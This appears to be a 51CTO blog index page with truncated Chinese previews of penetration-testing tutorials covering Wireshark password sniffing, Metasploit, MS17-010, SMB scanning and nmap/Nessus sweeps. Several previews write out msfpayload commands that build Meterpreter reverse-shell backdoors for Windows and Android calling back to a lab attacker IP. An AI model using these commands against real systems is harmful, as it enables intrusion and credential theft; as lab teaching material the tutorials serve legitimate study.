aricrack-ng
metasploit-ms17-010
本文仅供技术讨论,不能用于非法用途。Step 1:安装wireshark,并开启网卡混杂模式,抓包。不懂的同学问度娘,就不在本文讨论了。 Step 2:背景东哥报销系统的账户和密码是自动登陆,时间长了密码不记得了,今天我们就通过wireshark来找回密码。 Step 3:对数据包进行过滤,命令如下http.request.method== "POST" S
今天来熟悉一下meterpreter,使用环境是KALI、windowsXP Kali地址:192.168.11.41windowsXP地址:192.168.11.58 首先生成可执行文件root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.11.41
1.首先生成后门程序 msfpayload android/meterpreter/reverse_tcp LHOST=172.16.1.109 LPORT=4444 R > /root/Desktop/apk.apk2.打开metasploit use exploit/mutli/handler set payload android/meterpreter/rever
上个礼拜去旅游,累出翔来了,真想不明白为什么那么多人花钱去买罪受。今天更新一篇,最近在做51的视频教程,旅游回来一直没缓过来劲,这算是学习笔记吧。 Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux System
metasploit常用辅助工具最近在写教程,记录一下 root@bt:~# msfpro [*] Starting Metasploit Console... MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vM
从新浪移动过来了关于SMB版本的扫描那个smb2的溢出,其实在metasploit里面有两个扫描器可以用,效果都差不多,只是一个判断的更加详细,一个只是粗略的判断。Welcome to the Metasploit Web Console! _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | \ / _ ) _)/ _ |/
从新浪移过来的Windows XP SP2-SP3 / Windows Vista SP0 / IE 7Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/
笔耕不辍root@bt:~# msfpro [*] Starting Metasploit Console... [-] WARNING! The following modules could not be loaded! [-] /opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/local/mmap.rb
好几天没有写新文章了,今天出差难得清静,更新一篇。1.首先用nmap获取一下在线信息,结果如下namp -sP 192.168.16.0/24总共有22个IP地址存活,总会有一些肥羊的。2.用nessus进行进一步探测,我们可以看到除了我自己的系统漏洞最多以外,有192.168.16.68,和192.168.15.254存在高危漏洞。通过进一步对比发现192.168.1
Copyright © 2005-2025 51CTO.COM 版权所有 京ICP证060544号